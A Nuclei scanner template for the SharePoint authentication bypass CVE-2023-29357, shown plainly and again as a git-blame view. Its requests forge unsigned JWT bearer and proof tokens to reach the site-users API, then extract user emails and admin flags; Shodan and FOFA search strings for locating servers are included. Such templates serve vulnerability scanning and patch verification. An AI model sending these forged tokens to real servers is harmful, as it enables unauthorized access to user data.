nuclei-templates/http/cves/2023/CVE-2023-29357.yaml

id: CVE-2023-29357

info:
  name: Microsoft SharePoint - Authentication Bypass
  author: pdteam
  severity: critical
  description: |
    Microsoft SharePoint Server Elevation of Privilege Vulnerability
  reference:
    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357
    - https://srcincite.io/advisories/src-2020-0022/
    - https://github.com/Chocapikk/CVE-2023-29357
    - https://sec.vnpt.vn/2023/08/phan-tich-cve-2023-29357-microsoft-sharepoint-validatetokenissuer-authentication-bypass-vulnerability/
    - https://starlabs.sg/blog/2023/09-sharepoint-pre-auth-rce-chain/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-29357
    epss-score: 0.76124
    epss-percentile: 0.97814
    cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: microsoft
    product: sharepoint_server
    shodan-query: http.headers_hash:-1968878704
    fofa-query: app="Microsoft-SharePoint"
  tags: cve,cve2023,microsoft,sharepoint_server
variables:
  client_id: "00000003-0000-0ff1-ce00-000000000000"

http:
  - raw:
      - |
        GET /_api/web/siteusers HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer
      - |
        GET /_api/web/siteusers HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json
        Authorization: Bearer {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
        X-PROOF_TOKEN: {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA

    extractors:
      - type: regex
        part: header
        group: 1
        name: realm
        regex:
          - realm="([^"]*)"
        internal: true

      - type: json
        json:
          - .value[].Email
    matchers:
      - type: word
        part: body_2
        words:
          - LoginName
          - Email
          - IsSiteAdmin
        condition: and
Added CVE-2023-29357 (Microsoft SharePoint - Authentication Bypass) 2023-09-29 13:21:23 +00:00			`id: CVE-2023-29357`

			`info:`
			`name: Microsoft SharePoint - Authentication Bypass`
			`author: pdteam`
			`severity: critical`
			`description: \|`
			`Microsoft SharePoint Server Elevation of Privilege Vulnerability`
			`reference:`
			`- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357`
			`- https://srcincite.io/advisories/src-2020-0022/`
			`- https://github.com/Chocapikk/CVE-2023-29357`
			`- https://sec.vnpt.vn/2023/08/phan-tich-cve-2023-29357-microsoft-sharepoint-validatetokenissuer-authentication-bypass-vulnerability/`
			`- https://starlabs.sg/blog/2023/09-sharepoint-pre-auth-rce-chain/`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2023-29357`
TemplateMan Update [Mon Oct 16 10:55:13 UTC 2023] :robot: 2023-10-16 10:55:14 +00:00			`epss-score: 0.76124`
			`epss-percentile: 0.97814`
Added CVE-2023-29357 (Microsoft SharePoint - Authentication Bypass) 2023-09-29 13:21:23 +00:00			`cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:::::::*`
			`metadata:`
			`verified: true`
			`max-request: 2`
			`vendor: microsoft`
			`product: sharepoint_server`
			`shodan-query: http.headers_hash:-1968878704`
templateman update 2023-10-14 11:27:55 +00:00			`fofa-query: app="Microsoft-SharePoint"`
Added CVE-2023-29357 (Microsoft SharePoint - Authentication Bypass) 2023-09-29 13:21:23 +00:00			`tags: cve,cve2023,microsoft,sharepoint_server`
			`variables:`
			`client_id: "00000003-0000-0ff1-ce00-000000000000"`

			`http:`
			`- raw:`
			`- \|`
			`GET /_api/web/siteusers HTTP/1.1`
			`Host: {{Hostname}}`
			`Authorization: Bearer`
			`- \|`
			`GET /_api/web/siteusers HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: application/json`
			`Authorization: Bearer {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA`
			`X-PROOF_TOKEN: {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA`

			`extractors:`
			`- type: regex`
			`part: header`
			`group: 1`
			`name: realm`
			`regex:`
			`- realm="([^"]*)"`
			`internal: true`

			`- type: json`
			`json:`
			`- .value[].Email`
			`matchers:`
			`- type: word`
strict matcher 2023-09-29 13:34:39 +00:00			`part: body_2`
Added CVE-2023-29357 (Microsoft SharePoint - Authentication Bypass) 2023-09-29 13:21:23 +00:00			`words:`
			`- LoginName`
			`- Email`
			`- IsSiteAdmin`
			`condition: and`